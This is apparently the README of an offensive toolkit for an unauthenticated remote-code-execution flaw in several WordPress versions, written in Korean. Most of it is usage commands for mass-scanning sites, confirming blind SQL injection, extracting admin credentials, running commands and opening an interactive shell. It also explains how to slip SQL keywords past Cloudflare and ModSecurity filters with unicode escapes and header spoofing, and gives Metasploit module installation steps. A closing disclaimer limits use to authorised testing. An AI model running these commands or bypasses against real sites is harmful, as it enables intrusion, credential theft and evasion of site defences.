
WordPress 사전 인증 RCE 익스플로잇 + 스캐너 + WAF 우회 | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit 모듈 + Docker 랩
_ _____ |__ \ / / ___ / / /
| | /| / / _ \ / // / __ / _ / / /
| |/ |/ / // _// / / / / / / /
|/|/_//____//// //_///
WordPress 사전 인증 RCE — CVE-2026-63030 + CVE-2026-60137 제작: Venexy (M4xSec)
WordPress 6.8.0–6.8.5, 6.9.0–6.9.4, 7.0.0–7.0.1에서 인증되지 않은 원격 코드 실행(RCE). 6.8.6, 6.9.5, 7.0.2에서 패치됨.
# 사전 컴파일된 바이너리 (가장 빠름)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell
# 또는 소스에서 빌드
go build -o wp2shell go-scanner/wp2shell-master.go
parse_request()로 관리자 위조go-scanner/wp2shell-master.go)올인원 바이너리 — 스캔, 확인, 읽기, 익스플로잇, 인터랙티브 셸.
go build -o wp2shell-master go-scanner/wp2shell-master.go
# 대량 스캔
./wp2shell-master scan -f targets.txt -j -t 20
# SQLi 확인
./wp2shell-master check https://target.com --waf --delay 3.0
# 관리자 자격 증명 추출
./wp2shell-master read https://target.com --preset users
# 사전 인증 RCE (비밀번호 불필요)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth
# 인터랙티브 셸
./wp2shell-master rce https://target.com -i -y
waf-bypass/)SQL 키워드의 JSON 유니코드 이스케이프를 통한 Cloudflare/ModSecurity 우회용 독립 실행 스크립트.
core.py — WAF 우회가 포함된 공용 블라인드 SQLi 엔진dump_version.py — @@version 추출dump_dbname.py — DATABASE() 추출dump_tables.py — 테이블 열거dump_columns.py — 컬럼 열거rce_shell.py — WAF 우회를 포함한 전체 RCE 체인metasploit-modules/)로컬 설치:
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb
Cloudflare WAF는 원시 JSON 바이트를 검사하지만 패턴 매칭 전에 \uXXXX 이스케이프 시퀀스를 디코딩하지 않습니다. WordPress의 PHP json_decode()는 이를 투명하게 디코딩합니다.
SLEEP → SLEEP — 키워드 탐지 우회: 대신 http://:) — 더 짧고 URI 패턴 규칙을 회피/wp-json/batch/v1 permalink 경로 — ?rest_route= 차단 회피Origin + Referer 헤더 — CORS/동일 출처 검사 충족cd lab
docker compose up -d --build
# WordPress 6.9.0 at http://localhost:8888
# Admin: admin / Summer2026!
Cloudflare 스타일 규칙을 적용한 ModSecurity CRS(OWASP) — 유니코드 우회 확인됨.
cd lab/waf
docker compose up -d --build
# WordPress behind WAF at http://localhost:9999
이 도구는 공인된 보안 테스트 전용입니다. 소유하고 있거나 테스트에 대한 명시적 서면 허가를 받은 시스템에만 사용하십시오. 무단 접근은 불법입니다.
MIT